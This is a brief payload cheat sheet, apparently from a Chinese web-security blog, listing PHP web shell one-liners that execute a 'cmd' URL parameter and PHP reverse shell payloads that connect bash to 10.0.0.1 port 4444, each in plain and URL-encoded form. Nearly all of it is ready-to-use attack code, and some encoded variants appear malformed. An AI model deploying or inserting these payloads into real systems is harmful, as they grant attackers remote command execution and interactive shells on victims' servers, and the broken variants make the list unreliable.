Web Shell
<?php system($_GET['cmd']);?> <?php echo system($_GET['cmd']);?>
<%3fphp+system($_['cmd']);%3f> <%3fphp+echo+system($_['cmd']);%3f>
命令执行:访问 /?cmd=whoami.
Reverse Shell
<?php system('bash -i >& /dev/tcp/10.0.0.1/4444 0>&1');?>
<?php system('bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"');?>
<%3fphp+system('bash+-i+>%26+%2fdev%2ftcp%2f10.0.0.1%2f4444+0>%261');%3f>
<%3fphp+system('bash+-c+"bash+-i+>%26+%2fdev%2ftcp%2f10.0.0.1%2f4444+0>%261"');%3f>
![[Web 安全] PHP 反序列化漏洞 —— PHP 反序列化漏洞演示案例](https://i-blog.csdnimg.cn/direct/52344c5286404447ad376eef1269dc23.gif)
